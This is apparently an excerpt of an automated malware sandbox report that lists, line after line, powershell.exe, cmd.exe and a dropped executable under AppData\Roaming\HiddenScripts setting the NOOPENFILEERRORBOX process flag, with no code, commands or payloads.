                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
